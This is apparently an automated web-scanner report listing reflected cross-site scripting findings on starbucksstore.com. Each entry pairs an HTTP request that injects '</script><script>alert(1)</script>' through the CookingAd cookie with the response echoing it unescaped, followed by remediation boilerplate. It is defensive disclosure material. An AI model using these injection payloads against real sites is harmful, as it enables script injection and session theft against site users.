GET /entertainment HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16383 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:01 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16383 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:44:12 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extras/newsletters.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16365 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:14 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42766 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:31 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_faq_shipop.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/gareturns.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15086 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:32 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturns.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/shcontus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20651 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/links.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15659 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:05 GMT Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/track.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 18382 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:07 GMT Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/include/SearchNav.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14427 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:44:17 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shabotus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14484 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:38 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shourplg.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25377 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:10 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13" var s_prop4="" var s_prop5="" var s_prop6="/products/shourplg.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:31 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp?SKU=309195 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 11887 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:26 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 309195 : " var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA" var s_prop4="" var s_prop5="309195 : " var s_prop6="/products/shprodde.asp?SKU=309195" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
